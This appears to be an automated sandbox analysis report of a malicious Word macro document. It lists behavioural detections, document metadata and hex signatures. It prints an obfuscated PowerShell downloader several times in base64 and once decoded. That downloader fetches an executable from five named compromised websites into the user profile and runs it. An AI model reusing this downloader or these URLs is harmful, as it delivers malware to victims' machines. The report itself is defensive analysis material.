AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAVABBAGAAUgBUACIAKAAkAGIAOABiADgANgA4ADMAMgAwAHgAMABjAHgAKQA7ACQAYgA0ADUANgAwAGIAeAAwADIAMgAwADUAPQAnAGMAMAAwADcAMgA2ADUANQAwADEANwAxACcAOwBiAHIAZQBhAGsAOwAkAGIANQAwAHgAMAA3ADkAOQAwADIAMAA0ADcAPQAnAGMANQAwADcAMAAzADAAMQA5ADgANgAwACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAHgAMAA2AGIAYwAzADAAMwAwADYAYgA3AD0AJwBiADgAMAAwADAAeAAxADAAMAA3AGIANgA4ACcA
Creates a hidden or system file
file: C:\Users\user\AppData\Local\Temp\~$pjlr0l6ur.doc
Windows Management Instrumentation (WMI) attempted to create a process
cmdline: powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJAB4ADEAYgAzAHgAMQA3ADkANgBjADMAPQAnAHgAYwAyADcANQAyADEANQAwADcANQAwADAAJwA7ACQAeAA4ADAAOAB4ADAAOQAwAHgAYwAwAGMAYwAgAD0AIAAnADgANQAyACcAOwAkAGMANQBjADgANwAwADgAYgA4ADcANgA4AD0AJwBiADgAMAAwADYAMAAwAGMAOQAwADQAJwA7ACQAYgA4AGIAOAA2ADgAMwAyADAAeAAwAGMAeAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAeAA4ADAAOAB4ADAAOQAwAHgAYwAwAGMAYwArACcALgBlAHgAZQAnADsAJABiADgANQAxADQANgBjADAAOQAxADIAMQA9ACcAeAAwADAAOQA2ADYANgBiADAAMAAwADIAJwA7ACQAeAAxADgAMAB4ADAANQA5AGMAMwBjAGMANwA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwBiAGoAZQAnACsAJwBjAHQAJwApACAATgBlAFQALgBXAGUAYgBDAGwASQBlAE4AVAA7ACQAeAB4ADMAMAA1ADcAMQA3ADAAOQAzAD0AJwBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBzAGsAdQBsAGwAYgBhAGwAaQAuAGMAbwBtAC8AYgBrAC4AdwBwAC0AYwBvAG4AdABlAG4AdAAvADMAMQAxAC8AQABoAHQAdABwADoALwAvAGMAaABlAGUAbQBhAHQAcgBhAG4AcwB4AHAAcgBlAHMAcwBpAG4AYwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AcwBoAG0ANQBkAGoAbAA0ADYAMwA4AC8AQABoAHQAdABwAHMAOgAvAC8AYQBjAGUAbwBuAHQAaABlAHIAbwBvAGYALgBjAG8AbQAvAGkAMABvAG4AaQAvAGcAegB4ADUANQA1ADAALwBAAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBkAGcAeABiAHkAZABhAG0AbwBuAGkAcQB1AGUALgBjAG8AbQAvAGYAcgA0AGoAdAAvAGMAYQBjAGgAZQAvAGkAbgBpAHQALgB1AHAAcABlAHIALwBoADgAOQAxADQALwBAAGgAdAB0AHAAcwA6AC8ALwBhAGEAcABsAGkAbgBkAGkAYQAuAGMAbwBtAC8AaABhAHIAZABlAHIALgBpAG4AYwAvAG8AZAB3ADgAeAB0AGgAOQA2AC8AJwAuACIAcwBgAHAAbABJAFQAIgAoACcAQAAnACkAOwAkAGIAOQAxADIAMAAzAHgANAAxADMAYgBjADAAPQAnAGIAOAA4AHgANAA4ADIAMABjADAAMQAwADYAJwA7AGYAbwByAGUAYQBjAGgAKAAkAGMAMQA4ADMAYgA1ADgAYgB4ADUAYwA3ADIAIABpAG4AIAAkAHgAeAAzADAANQA3ADEANwAwADkAMwApAHsAdAByAHkAewAkAHgAMQA4ADAAeAAwADUAOQBjADMAYwBjADcALgAiAGQAYABPAFcATgBMAE8AYQBgAGQARgBgAEkAbABlACIAKAAkAGMAMQA4ADMAYgA1ADgAYgB4ADUAYwA3ADIALAAgACQAYgA4AGIAOAA2ADgAMwAyADAAeAAwAGMAeAApADsAJAB4AGIAMwA1ADEAMAAwAHgAMwBjADUAMAA9ACcAYgAzADkAMAAyADIAMgAyADEAMAB4ADIAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAJwArACcAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABiADgAYgA4ADYAOAAzADIAMAB4ADAAYwB4ACkALgAiAGwAYABlAG4ARwBUAEgAIgAgAC0AZwBlACAAMwA4ADUAMgA3ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAVABBAGAAUgBUACIAKAAkAGIAOABiADgANgA4ADMAMgAwAHgAMABjAHgAKQA7ACQAYgA0ADUANgAwAGIAeAAwADIAMgAwADUAPQAnAGMAMAAwADcAMgA2ADUANQAwADEANwAxACcAOwBiAHIAZQBhAGsAOwAkAGIANQAwAHgAMAA3ADkAOQAwADIAMAA0ADcAPQAnAGMANQAwADcAMAAzADAAMQA5ADgANgAwACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAHgAMAA2AGIAYwAzADAAMwAwADYAYgA3AD0AJwBiADgAMAAwADAAeAAxADAAMAA3AGIANgA4ACcA
Windows Management Instrumentation (WMI) attempted to execute a command or scripting utility
cmdline: powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJAB4ADEAYgAzAHgAMQA3ADkANgBjADMAPQAnAHgAYwAyADcANQAyADEANQAwADcANQAwADAAJwA7ACQAeAA4ADAAOAB4ADAAOQAwAHgAYwAwAGMAYwAgAD0AIAAnADgANQAyACcAOwAkAGMANQBjADgANwAwADgAYgA4ADcANgA4AD0AJwBiADgAMAAwADYAMAAwAGMAOQAwADQAJwA7ACQAYgA4AGIAOAA2ADgAMwAyADAAeAAwAGMAeAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAeAA4ADAAOAB4ADAAOQAwAHgAYwAwAGMAYwArACcALgBlAHgAZQAnADsAJABiADgANQAxADQANgBjADAAOQAxADIAMQA9ACcAeAAwADAAOQA2ADYANgBiADAAMAAwADIAJwA7ACQAeAAxADgAMAB4ADAANQA5AGMAMwBjAGMANwA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwBiAGoAZQAnACsAJwBjAHQAJwApACAATgBlAFQALgBXAGUAYgBDAGwASQBlAE4AVAA7ACQAeAB4ADMAMAA1ADcAMQA3ADAAOQAzAD0AJwBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBzAGsAdQBsAGwAYgBhAGwAaQAuAGMAbwBtAC8AYgBrAC4AdwBwAC0AYwBvAG4AdABlAG4AdAAvADMAMQAxAC8AQABoAHQAdABwADoALwAvAGMAaABlAGUAbQBhAHQAcgBhAG4AcwB4AHAAcgBlAHMAcwBpAG4AYwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AcwBoAG0ANQBkAGoAbAA0ADYAMwA4AC8AQABoAHQAdABwAHMAOgAvAC8AYQBjAGUAbwBuAHQAaABlAHIAbwBvAGYALgBjAG8AbQAvAGkAMABvAG4AaQAvAGcAegB4ADUANQA1ADAALwBAAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBkAGcAeABiAHkAZABhAG0AbwBuAGkAcQB1AGUALgBjAG8AbQAvAGYAcgA0AGoAdAAvAGMAYQBjAGgAZQAvAGkAbgBpAHQALgB1AHAAcABlAHIALwBoADgAOQAxADQALwBAAGgAdAB0AHAAcwA6AC8ALwBhAGEAcABsAGkAbgBkAGkAYQAuAGMAbwBtAC8AaABhAHIAZABlAHIALgBpAG4AYwAvAG8AZAB3ADgAeAB0AGgAOQA2AC8AJwAuACIAcwBgAHAAbABJAFQAIgAoACcAQAAnACkAOwAkAGIAOQAxADIAMAAzAHgANAAxADMAYgBjADAAPQAnAGIAOAA4AHgANAA4ADIAMABjADAAMQAwADYAJwA7AGYAbwByAGUAYQBjAGgAKAAkAGMAMQA4ADMAYgA1ADgAYgB4ADUAYwA3ADIAIABpAG4AIAAkAHgAeAAzADAANQA3ADEANwAwADkAMwApAHsAdAByAHkAewAkAHgAMQA4ADAAeAAwADUAOQBjADMAYwBjADcALgAiAGQAYABPAFcATgBMAE8AYQBgAGQARgBgAEkAbABlACIAKAAkAGMAMQA4ADMAYgA1ADgAYgB4ADUAYwA3ADIALAAgACQAYgA4AGIAOAA2ADgAMwAyADAAeAAwAGMAeAApADsAJAB4AGIAMwA1ADEAMAAwAHgAMwBjADUAMAA9ACcAYgAzADkAMAAyADIAMgAyADEAMAB4ADIAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAJwArACcAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABiADgAYgA4ADYAOAAzADIAMAB4ADAAYwB4ACkALgAiAGwAYABlAG4ARwBUAEgAIgAgAC0AZwBlACAAMwA4ADUAMgA3ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAVABBAGAAUgBUACIAKAAkAGIAOABiADgANgA4ADMAMgAwAHgAMABjAHgAKQA7ACQAYgA0ADUANgAwAGIAeAAwADIAMgAwADUAPQAnAGMAMAAwADcAMgA2ADUANQAwADEANwAxACcAOwBiAHIAZQBhAGsAOwAkAGIANQAwAHgAMAA3ADkAOQAwADIAMAA0ADcAPQAnAGMANQAwADcAMAAzADAAMQA5ADgANgAwACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAHgAMAA2AGIAYwAzADAAMwAwADYAYgA3AD0AJwBiADgAMAAwADAAeAAxADAAMAA3AGIANgA4ACcA
A script or command line contains a long continuous string indicative of obfuscation
command: powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJAB4ADEAYgAzAHgAMQA3ADkANgBjADMAPQAnAHgAYwAyADcANQAyADEANQAwADcANQAwADAAJwA7ACQAeAA4ADAAOAB4ADAAOQAwAHgAYwAwAGMAYwAgAD0AIAAnADgANQAyACcAOwAkAGMANQBjADgANwAwADgAYgA4ADcANgA4AD0AJwBiADgAMAAwADYAMAAwAGMAOQAwADQAJwA7ACQAYgA4AGIAOAA2ADgAMwAyADAAeAAwAGMAeAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAeAA4ADAAOAB4ADAAOQAwAHgAYwAwAGMAYwArACcALgBlAHgAZQAnADsAJABiADgANQAxADQANgBjADAAOQAxADIAMQA9ACcAeAAwADAAOQA2ADYANgBiADAAMAAwADIAJwA7ACQAeAAxADgAMAB4ADAANQA5AGMAMwBjAGMANwA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwBiAGoAZQAnACsAJwBjAHQAJwApACAATgBlAFQALgBXAGUAYgBDAGwASQBlAE4AVAA7ACQAeAB4ADMAMAA1ADcAMQA3ADAAOQAzAD0AJwBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBzAGsAdQBsAGwAYgBhAGwAaQAuAGMAbwBtAC8AYgBrAC4AdwBwAC0AYwBvAG4AdABlAG4AdAAvADMAMQAxAC8AQABoAHQAdABwADoALwAvAGMAaABlAGUAbQBhAHQAcgBhAG4AcwB4AHAAcgBlAHMAcwBpAG4AYwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AcwBoAG0ANQBkAGoAbAA0ADYAMwA4AC8AQABoAHQAdABwAHMAOgAvAC8AYQBjAGUAbwBuAHQAaABlAHIAbwBvAGYALgBjAG8AbQAvAGkAMABvAG4AaQAvAGcAegB4ADUANQA1ADAALwBAAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBkAGcAeABiAHkAZABhAG0AbwBuAGkAcQB1AGUALgBjAG8AbQAvAGYAcgA0AGoAdAAvAGMAYQBjAGgAZQAvAGkAbgBpAHQALgB1AHAAcABlAHIALwBoADgAOQAxADQALwBAAGgAdAB0AHAAcwA6AC8ALwBhAGEAcABsAGkAbgBkAGkAYQAuAGMAbwBtAC8AaABhAHIAZABlAHIALgBpAG4AYwAvAG8AZAB3ADgAeAB0AGgAOQA2AC8AJwAuACIAcwBgAHAAbABJAFQAIgAoACcAQAAnACkAOwAkAGIAOQAxADIAMAAzAHgANAAxADMAYgBjADAAPQAnAGIAOAA4AHgANAA4ADIAMABjADAAMQAwADYAJwA7AGYAbwByAGUAYQBjAGgAKAAkAGMAMQA4ADMAYgA1ADgAYgB4ADUAYwA3ADIAIABpAG4AIAAkAHgAeAAzADAANQA3ADEANwAwADkAMwApAHsAdAByAHkAewAkAHgAMQA4ADAAeAAwADUAOQBjADMAYwBjADcALgAiAGQAYABPAFcATgBMAE8AYQBgAGQARgBgAEkAbABlACIAKAAkAGMAMQA4ADMAYgA1ADgAYgB4ADUAYwA3ADIALAAgACQAYgA4AGIAOAA2ADgAMwAyADAAeAAwAGMAeAApADsAJAB4AGIAMwA1ADEAMAAwAHgAMwBjADUAMAA9ACcAYgAzADkAMAAyADIAMgAyADEAMAB4ADIAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAJwArACcAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABiADgAYgA4ADYAOAAzADIAMAB4ADAAYwB4ACkALgAiAGwAYABlAG4ARwBUAEgAIgAgAC0AZwBlACAAMwA4ADUAMgA3ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAVABBAGAAUgBUACIAKAAkAGIAOABiADgANgA4ADMAMgAwAHgAMABjAHgAKQA7ACQAYgA0ADUANgAwAGIAeAAwADIAMgAwADUAPQAnAGMAMAAwADcAMgA2ADUANQAwADEANwAxACcAOwBiAHIAZQBhAGsAOwAkAGIANQAwAHgAMAA3ADkAOQAwADIAMAA0ADcAPQAnAGMANQAwADcAMAAzADAAMQA5ADgANgAwACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAHgAMAA2AGIAYwAzADAAMwAwADYAYgA3AD0AJwBiADgAMAAwADAAeAAxADAAMAA3AGIANgA4ACcA
The office file contains a macro with suspicious strings
ChrW: May attempt to obfuscate specific strings (use option --deobf to deobfuscate)
virtual: May detect virtualization
CreateObject: May create an OLE object
system: May run an executable file or a system command on a Mac (if combined with libc.dylib)
ShowWindow: May hide the application
Open: May open a file
Attempts to execute suspicious powershell command arguments
command: powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJAB4ADEAYgAzAHgAMQA3ADkANgBjADMAPQAnAHgAYwAyADcANQAyADEANQAwADcANQAwADAAJwA7ACQAeAA4ADAAOAB4ADAAOQAwAHgAYwAwAGMAYwAgAD0AIAAnADgANQAyACcAOwAkAGMANQBjADgANwAwADgAYgA4ADcANgA4AD0AJwBiADgAMAAwADYAMAAwAGMAOQAwADQAJwA7ACQAYgA4AGIAOAA2ADgAMwAyADAAeAAwAGMAeAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAeAA4ADAAOAB4ADAAOQAwAHgAYwAwAGMAYwArACcALgBlAHgAZQAnADsAJABiADgANQAxADQANgBjADAAOQAxADIAMQA9ACcAeAAwADAAOQA2ADYANgBiADAAMAAwADIAJwA7ACQAeAAxADgAMAB4ADAANQA5AGMAMwBjAGMANwA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwBiAGoAZQAnACsAJwBjAHQAJwApACAATgBlAFQALgBXAGUAYgBDAGwASQBlAE4AVAA7ACQAeAB4ADMAMAA1ADcAMQA3ADAAOQAzAD0AJwBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBzAGsAdQBsAGwAYgBhAGwAaQAuAGMAbwBtAC8AYgBrAC4AdwBwAC0AYwBvAG4AdABlAG4AdAAvADMAMQAxAC8AQABoAHQAdABwADoALwAvAGMAaABlAGUAbQBhAHQAcgBhAG4AcwB4AHAAcgBlAHMAcwBpAG4AYwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AcwBoAG0ANQBkAGoAbAA0ADYAMwA4AC8AQABoAHQAdABwAHMAOgAvAC8AYQBjAGUAbwBuAHQAaABlAHIAbwBvAGYALgBjAG8AbQAvAGkAMABvAG4AaQAvAGcAegB4ADUANQA1ADAALwBAAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBkAGcAeABiAHkAZABhAG0AbwBuAGkAcQB1AGUALgBjAG8AbQAvAGYAcgA0AGoAdAAvAGMAYQBjAGgAZQAvAGkAbgBpAHQALgB1AHAAcABlAHIALwBoADgAOQAxADQALwBAAGgAdAB0AHAAcwA6AC8ALwBhAGEAcABsAGkAbgBkAGkAYQAuAGMAbwBtAC8AaABhAHIAZABlAHIALgBpAG4AYwAvAG8AZAB3ADgAeAB0AGgAOQA2AC8AJwAuACIAcwBgAHAAbABJAFQAIgAoACcAQAAnACkAOwAkAGIAOQAxADIAMAAzAHgANAAxADMAYgBjADAAPQAnAGIAOAA4AHgANAA4ADIAMABjADAAMQAwADYAJwA7AGYAbwByAGUAYQBjAGgAKAAkAGMAMQA4ADMAYgA1ADgAYgB4ADUAYwA3ADIAIABpAG4AIAAkAHgAeAAzADAANQA3ADEANwAwADkAMwApAHsAdAByAHkAewAkAHgAMQA4ADAAeAAwADUAOQBjADMAYwBjADcALgAiAGQAYABPAFcATgBMAE8AYQBgAGQARgBgAEkAbABlACIAKAAkAGMAMQA4ADMAYgA1ADgAYgB4ADUAYwA3ADIALAAgACQAYgA4AGIAOAA2ADgAMwAyADAAeAAwAGMAeAApADsAJAB4AGIAMwA1ADEAMAAwAHgAMwBjADUAMAA9ACcAYgAzADkAMAAyADIAMgAyADEAMAB4ADIAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAJwArACcAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABiADgAYgA4ADYAOAAzADIAMAB4ADAAYwB4ACkALgAiAGwAYABlAG4ARwBUAEgAIgAgAC0AZwBlACAAMwA4ADUAMgA3ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAVABBAGAAUgBUACIAKAAkAGIAOABiADgANgA4ADMAMgAwAHgAMABjAHgAKQA7ACQAYgA0ADUANgAwAGIAeAAwADIAMgAwADUAPQAnAGMAMAAwADcAMgA2ADUANQAwADEANwAxACcAOwBiAHIAZQBhAGsAOwAkAGIANQAwAHgAMAA3ADkAOQAwADIAMAA0ADcAPQAnAGMANQAwADcAMAAzADAAMQA5ADgANgAwACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAHgAMAA2AGIAYwAzADAAMwAwADYAYgA3AD0AJwBiADgAMAAwADAAeAAxADAAMAA3AGIANgA4ACcA
decoded_base64_string: <# https://www.microsoft.com/ #> $x1b3x1796c3='xc27521507500';$x808x090xc0cc = '852';$c5c8708b8768='b800600c904';$b8b868320x0cx=$env:userprofile+'\'+$x808x090xc0cc+'.exe';$b85146c09121='x009666b0002';$x180x059c3cc7=.('new'+'-obje'+'ct') NeT.WebClIeNT;$xx305717093='https://www.skullbali.com/bk.wp-content/311/@http://cheematransxpressinc.com/wp-includes/shm5djl4638/@https://aceontheroof.com/i0oni/gzx5550/@http://www.dgxbydamonique.com/fr4jt/cache/init.upper/h8914/@https://aaplindia.com/harder.inc/odw8xth96/'."s`plIT"('@');$b91203x413bc0='b88x4820c0106';foreach($c183b58bx5c72 in $xx305717093){try{$x180x059c3cc7."d`OWNLOa`dF`Ile"($c183b58bx5c72, $b8b868320x0cx);$xb35100x3c50='b390222210x2';If ((&('Ge'+'t-I'+'tem') $b8b868320x0cx)."l`enGTH" -ge 38527) {[Diagnostics.Process]::"sTA`RT"($b8b868320x0cx);$b4560bx02205='c00726550171';break;$b50x079902047='c50703019860'}}catch{}}$x06bc30306b7='b8000x1007b68'

Screenshots


Hosts

Direct IP Country Name
Y 8.8.8.8 [VT] United States

DNS

Name Response Post-Analysis Lookup
www.skullbali.com [VT]
cheematransxpressinc.com [VT]
aceontheroof.com [VT]
www.dgxbydamonique.com [VT]
aaplindia.com [VT]

Summary

SummaryInformation Metadata

Creating Application Microsoft Office Word
Author Delmer Reichert
Last Saved By Arjun Flatley
Creation Time None
Last Saved Time None
Total Edit Time 0
Document Title Re-contextualized
Document Subject TCP
Amount of Pages 1
Amount of Words 29
Amount of Characters 168

DocumentSummaryInformation Metadata

Company Mayert, Lesch and Becker
Document Version None
Digital Signature None
Language None
Notes None

File Analysis (Signatures)

HexStrings
c200951c \xc2\x00\x95\x1c
cc0904785634 \xcc \x04xV4
300312c304 0\x03\x12\xc3\x04
c3983bc9991c \xc3\x98;\xc9\x99\x1c
b420c1c7c2 \xb4 \xc1\xc7\xc2
c0102858 \xc0\x10(X
b002501b92cc \xb0\x02P\x1b\x92\xcc
b45b4700 \xb4[G\x00
07b0b819b1 \x07\xb0\xb8\x19\xb1
c322c38c53b0 \xc3"\xc3\x8cS\xb0
10003c917049 \x10\x00<\x91pI
cc2810023172 \xcc(\x10\x021r
cc8c2473 \xcc\x8c$s
b4808061 \xb4\x80\x80a
304605070914 0F\x05\x07 \x14
20500031c8 P\x001\xc8
b520032986 \xb5 \x03)\x86
c824c25681 \xc8$\xc2V\x81
50920b21c5 P\x92\x0b!\xc5
86207380b664 \x86 s\x80\xb6d
b491104015b0 \xb4\x91\x10@\x15\xb0
43048995 C\x04\x89\x95
b80230b09208 \xb8\x020\xb0\x92\x08
c071945370 \xc0q\x94Sp
cc42c0609320 \xccB\xc0`\x93
500130104827 P\x010\x10H'
04173b2158 \x04\x17;!X
804137700b \x80A7p\x0b
756c89b8 ul\x89\xb8
c020049c002c \xc0 \x04\x9c\x00,
37b0c90610c6 7\xb0\xc9\x06\x10\xc6
c02109001300 \xc0! \x00\x13\x00
10004001b2 \x10\x00@\x01\xb2
cb3029902660 \xcb0)\x90&`
c580c11b60 \xc5\x80\xc1\x1b`
bb8055802428 \xbb\x80U\x80$(
63c877b535 c\xc8w\xb55
c10c80600203 \xc1\x0c\x80`\x02\x03
c6847911c6 \xc6\x84y\x11\xc6
009982c49963 \x00\x99\x82\xc4\x99c
0760820109 \x07`\x82\x01
50505050 PPPP
3250505050 2PPPP
c505050e50505050505050505050 \xc5\x05\x05\x0ePPPPPPPPPP
c007749801 \xc0\x07t\x98\x01
90933c0328 \x90\x93<\x03(
8c9407c509 \x8c\x94\x07\xc5
7609829546 v \x82\x95F
b0452c1b473b \xb0E,\x1bG;
c014c0346385 \xc0\x14\xc04c\x85
2261c91600 "a\xc9\x16\x00
cc0879009c \xcc\x08y\x00\x9c
c77146673178 \xc7qFg1x
b2bc100705 \xb2\xbc\x10\x07\x05
c08090315970 \xc0\x80\x901Yp
c949bc40 \xc9I\xbc@
9046714200 \x90FqB\x00
10365108cb20 \x106Q\x08\xcb
062902692bc6 \x06)\x02i+\xc6
c7320c097b02 \xc72\x0c {\x02
cc89113468 \xcc\x89\x114h
4b820508c0 K\x82\x05\x08\xc0
cb0004090413 \xcb\x00\x04 \x04\x13
b04058900580 \xb0@X\x90\x05\x80
c0000899c0 \xc0\x00\x08\x99\xc0
0080b76900 \x00\x80\xb7i\x00
6c546083 lT`\x83
90933c0328 \x90\x93<\x03(
cc0904785634 \xcc \x04xV4
42320906 B2 \x06
3870730713 8ps\x07\x13
07405243 \x07@RC
c52300514401 \xc5#\x00QD\x01
9847b20800 \x98G\xb2\x08\x00
12b07330 \x12\xb0s0
cc99294690b8 \xcc\x99)F\x90\xb8
b303973c7b05 \xb3\x03\x97<{\x05
33b9b6213015 3\xb9\xb6!0\x15
c190568651 \xc1\x90V\x86Q
79579797 yW\x97\x97
93072b02 \x93\x07+\x02
c90757085608 \xc9\x07W\x08V\x08
c275b93080 \xc2u\xb90\x80
72900010 r\x90\x00\x10
609b660100 `\x9bf\x01\x00
cb220006c262 \xcb"\x00\x06\xc2b
c871848709b3 \xc8q\x84\x87 \xb3
0394030016 \x03\x94\x03\x00\x16
708c08cc p\x8c\x08\xcc
01bcb4563030 \x01\xbc\xb4V00
c07904cc09bc \xc0y\x04\xcc \xbc
43002500 C\x00%\x00
7b70c491 {p\xc4\x91
c94c20b06b21 \xc9L \xb0k!
bb5b69070b75 \xbb[i\x07\x0bu
b494032096 \xb4\x94\x03 \x96
b399038400 \xb3\x99\x03\x84\x00
cb9307185213 \xcb\x93\x07\x18R\x13
c8064003b5 \xc8\x06@\x03\xb5
cc68c05569 \xcch\xc0Ui
350190252ccc 5\x01\x90%,\xcc
b02588701200 \xb0%\x88p\x12\x00
b2c288030851 \xb2\xc2\x88\x03\x08Q
c9b8087cb318 \xc9\xb8\x08|\xb3\x18
b58030c82c55 \xb5\x800\xc8,U
b0c308b06c10 \xb0\xc3\x08\xb0l\x10
b491104015b0 \xb4\x91\x10@\x15\xb0
77033008 w\x030\x08
b083b09004 \xb0\x83\xb0\x90\x04
c9832b7752 \xc9\x83+wR
b502c6360b \xb5\x02\xc66\x0b
b050906984 \xb0P\x90i\x84
c5808011 \xc5\x80\x80\x11
b080202844 \xb0\x80 (D
08062018b224 \x08\x06 \x18\xb2$
c0046103 \xc0\x04a\x03
c480b9600983 \xc4\x80\xb9` \x83
3107201b 1\x07 \x1b
c607308b \xc6\x070\x8b
65020c4cc3 e\x02\x0cL\xc3
c760907cc081 \xc7`\x90|\xc0\x81
c30600b2 \xc3\x06\x00\xb2
c3280060054b \xc3(\x00`\x05K
c5095097 \xc5 P\x97
c70b000710c4 \xc7\x0b\x00\x07\x10\xc4
c208518417 \xc2\x08Q\x84\x17
b47cc020bb \xb4|\xc0 \xbb
c06000c022 \xc0`\x00\xc0"
45678742b800 Eg\x87B\xb8\x00
b5200c472b \xb5 \x0cG+
8502305000b6 \x85\x020P\x00\xb6
2798c390994c '\x98\xc3\x90\x99L
c02310022068 \xc0#\x10\x02 h
b5850503 \xb5\x85\x05\x03
5c3131989306 \11\x98\x93\x06
b0310090b176 \xb01\x00\x90\xb1v
c5840c972021 \xc5\x84\x0c\x97 !
c4675c0007 \xc4g\\x00\x07
5586930b00 U\x86\x93\x0b\x00
cb255858037c \xcb%XX\x03|
b107503b50 \xb1\x07P;P
36479904 6G\x99\x04
c06601bc30 \xc0f\x01\xbc0
b307630047 \xb3\x07c\x00G
90c90c0011 \x90\xc9\x0c\x00\x11
2c504407 ,PD\x07
c5000200c1 \xc5\x00\x02\x00\xc1
402b1b60 @+\x1b`
c2b882b739 \xc2\xb8\x82\xb79
b02222b307 \xb0""\xb3\x07
60680561 `h\x05a
b642600b26c7 \xb6B`\x0b&\xc7
bc8365056616 \xbc\x83e\x05f\x16
cb205051cb01 \xcb PQ\xcb\x01
b3400843680c \xb3@\x08Ch\x0c
c33186400cb8 \xc31\x86@\x0c\xb8
b39c01c300 \xb3\x9c\x01\xc3\x00
c3b43406 \xc3\xb44\x06
c806301757c8 \xc8\x060\x17W\xc8
0077c060 \x00w\xc0`
bbb670062718 \xbb\xb6p\x06'\x18
c00037659b \xc0\x007e\x9b
8c00490501 \x8c\x00I\x05\x01
b068007c \xb0h\x00|
b08c6b8565 \xb0\x8ck\x85e
c2c3700c4571 \xc2\xc3p\x0cEq
c1127b0595 \xc1\x12{\x05\x95
b00b61b06b33 \xb0\x0ba\xb0k3
7c05351310 |\x055\x13\x10
7c00095079 |\x00 Py
50606b7008 P`kp\x08
c863c91612 \xc8c\xc9\x16\x12
bcbc2000cb \xbc\xbc \x00\xcb
b70c05c7c0 \xb7\x0c\x05\xc7\xc0
b1901017c0 \xb1\x90\x10\x17\xc0
71307b87b3 q0{\x87\xb3
bc85520bc410 \xbc\x85R\x0b\xc4\x10
6c00200077 l\x00 \x00w
50b0707b05 P\xb0p{\x05
030980060b \x03 \x80\x06\x0b
0800068530 \x08\x00\x06\x850
c084042440 \xc0\x84\x04$@
b0c94b030908 \xb0\xc9K\x03 \x08
bb90995b \xbb\x90\x99[
b00b9b1145 \xb0\x0b\x9b\x11E
c3206cb70c77 \xc3 l\xb7\x0cw
c36cb0cc32 \xc3l\xb0\xcc2
3646850620 6F\x85\x06
c0635c5b06 \xc0c\[\x06
b850b000 \xb8P\xb0\x00
34001090 4\x00\x10\x90
b04306961304 \xb0C\x06\x96\x13\x04
b848200689 \xb8H \x06\x89
49c0c5072c05 I\xc0\xc5\x07,\x05
bc6950874264 \xbciP\x87Bd
c7c5769200 \xc7\xc5v\x92\x00
b0069056 \xb0\x06\x90V
b1300b0bbb \xb10\x0b\x0b\xbb
b095bb019b \xb0\x95\xbb\x01\x9b
c710066929 \xc7\x10\x06i)
7b60286813 {`(h\x13
b50400c5b730 \xb5\x04\x00\xc5\xb70
c0596c0805 \xc0Yl\x08\x05
b0b6b3bb1303 \xb0\xb6\xb3\xbb\x13\x03
b40989606219 \xb4 \x89`b\x19
b4506c3868 \xb4Pl8h
08336009 \x083`
b1370c009017 \xb17\x0c\x00\x90\x17
b00684040001 \xb0\x06\x84\x04\x00\x01
b497411264 \xb4\x97A\x12d
b10750000844 \xb1\x07P\x00\x08D
b777930373 \xb7w\x93\x03s
c685443003 \xc6\x85D0\x03
c0c4b6921c90 \xc0\xc4\xb6\x92\x1c\x90
b26cc5300b39 \xb2l\xc50\x0b9
7898400000 x\x98@\x00\x00
